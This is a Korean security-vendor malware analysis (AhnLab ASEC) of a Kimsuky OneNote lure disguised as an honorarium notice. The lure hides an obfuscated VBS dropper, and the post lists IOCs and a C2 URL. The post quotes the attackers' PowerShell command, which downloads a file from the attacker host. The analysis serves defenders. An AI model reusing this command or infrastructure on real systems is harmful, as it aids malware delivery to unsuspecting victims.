AhnLab Security Emergency response Center(ASEC)에서는 사례비 지급 내용으로 위장한 원노트(OneNote) 악성코드가 유포 중임을 확인하였다. 확인된 파일은 아래 블로그에 작성된 LNK 유형의 악성코드와 동일한 연구소를 사칭하고 있으며 실행되는 VBS 파일의 악성 행위가 유사한 것으로 보아 동일 공격 그룹의 소행으로 확인된다.
원 노트 파일 실행 시 다음과 같이 사례비 지급 내용을 담고 있으며, 한글 문서가 첨부된 것으로 보이는 위치를 클릭하도록 유도한다.
그림 1. 원 노트 실행시 본문 내용
해당 위치에는 [그림 2]와 같이 한글 문서가 아닌 personal.vbs 명의 악성 스크립트 개체가 숨어 있다.
그림 2. 숨겨져있는 악성 스크립트
사용자가 이를 클릭하면 악성 VBS 파일이 personal.vbs 명으로 임시 경로에 생성 및 실행된다. 생성된 VBS 파일의 코드는 다음과 같이 난독화된 명령어를 주석처럼 보이도록 한 후 이를 다시 읽어 복호화 후 악성 명령어를 실행한다.
그림 3. personal.vbs 코드
복호화된 스크립트 코드는 최종적으로 hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 에 접속하여 추가 스크립트 코드를 실행한다. 현재 해당 URL에 접속 불가하지만 URL 형식으로 보아 아래 블로그와 정보 유출 기능의 스크립트를 실행하였을 것으로 추정된다.
이후 파워쉘 명령어 통해 hxxp://delps.scienceontheweb.net/ital/info/sample.hwp에서 한글 파일을 다운로드하여 실행한다.
- 실행되는 파워쉘 명령어
powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace(‘shell:Downloads’).Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\personal.hwp;start-sleep -seconds 1
그림4. 최종적으로 실행되는 스크립트 코드
분석 당시 한글 문서가 다운로드 되지 않았지만 사용자에게 정상적인 문서 파일로 보이기 위해 정상 한글 문서를 다운로드 하였을 것으로 보인다. 또한, 원 노트에 작성된 한글 파일명이 <패스워드 파일로 위장하여 유포 중인 악성코드> 게시글에 첨부한 [그림 10] 과 동일한 파일명(개인정보이용동의서.hwp)을 사용하고 있어 이와 유사한 양식의 한글 문서가 실행되었을 것으로 추정된다.
최근 Kimsuky 그룹에서 워드 문서로 유포하였던 악성코드를 CHM, LNK, OneNote 등 다양한 형식의 악성코드로 유포하고 있는 것이 확인되어 사용자의 각별한 주의가 필요하다. 해당 파일들은 주로 사례비 양식, 개인정보 양식을 위장하여 메일로 유포되고 있어 사용자는 첨부파일 실행에 유의해야한다.
[파일 진단]
Dropper/MSOffice.Generic (2023.03.20.02)
Trojan/VBS.Generic.SC186657 (2023.03.03.00)
[IOC]
MD5
aa756b20170aa0869d6f5d5b5f1b7c37 – OneNote
f2a0e92b80928830704a00c91df87644 – VBS
C2
hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] 공개하고 있으며, 주로 메일에 MS 오피스 문서 파일이나 [2] 원노트 [3], CHM[4]과 같은 악성 파일들을 첨부하는 방식의 스피어 피싱 공격을 […]
[…] 사례비 지급 내용으로 위장한 OneNote 악성코드 (Kimsuky) – 2023.03.20 […]